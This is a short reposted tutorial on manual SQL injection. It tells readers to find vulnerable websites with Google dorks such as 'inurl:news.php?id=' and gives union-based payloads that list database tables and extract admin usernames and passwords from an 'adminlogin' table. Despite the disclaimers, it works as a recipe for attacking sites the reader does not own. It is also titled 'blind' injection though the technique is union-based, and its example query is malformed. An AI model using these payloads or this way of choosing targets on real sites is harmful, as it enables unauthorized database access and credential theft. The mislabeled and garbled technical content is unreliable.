HOWTO : Blind SQL Injection

*** Do NOT attack any computer or network without authorization or you may put into jail. ***



Credit to : KFProdigy



This is KFProdigy's work but not mine. I re-post it for educational purpose only.











Hello everyone, In this tutorial I show you how to manually do an SQL injection into a vulnerable site. Also, at the beginning when i say "google dorks", I dont mean that people from google are dorks, i mean actually go to google and search "dork" or "dorks"

basically its something like "inurl:news.php?id=" or anything along those lines. I hope this helps!



For more tutorials and tools, check out http://sqliunderground.co.cc , I have a really in-depth tutorial on there.

P.S. This is for educational purposes only.





THE THINGS I PASTE

group_concat(table_name)



from information_schema.tables where table_schema=database()--



concat(column,0x3a,column) from table/*



An example would be

Example.com/index.php?id=-32 UNION SELECT 1,2,3,4,5,concat(username,0x3a,password) from adminlogin/*,7,8,9 from information_schema.columns where table_schema=database()--



That's all! See you.